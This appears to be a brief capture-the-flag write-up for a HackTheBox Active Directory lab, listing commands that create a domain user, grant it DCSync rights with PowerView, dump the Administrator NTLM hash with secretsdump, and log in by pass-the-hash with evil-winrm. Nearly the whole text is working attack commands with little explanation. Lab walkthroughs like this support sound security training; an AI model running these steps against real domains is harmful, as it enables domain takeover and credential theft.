DCSync

We need to import PowerView first. And we follow these simple steps:

net user anonmak9 Pass123 /add /domain
net group "Exchange Windows Permissions" anonmak9 /add
net localgroup "Remote Management Users" anonmak9 /add

$SecPass = ConvertTo-SecureString 'Pass123' -AsPlainText -Force

$Cred = New-Object System.Management.Automation.PSCredential('htb.local\anonmak9', $SecPass)

Add-ObjectACL -PrincipalIdentity anonmak9 -Credential $Cred -Rights DCSync

secretsdump.py htb.local/[email protected] -just-dc-user Administrator -just-dc-ntl

Couldn't crack it so using it as Pass-the-Hash

hashcat -m 1000 admin_hash /usr/share/wordlists/rockyou.txt.gz

evil-winrm -i 10.10.10.161 -u Administrator -H 32693b11e6aa90eb43d32c72a07ceea6

Last updated 1 year ago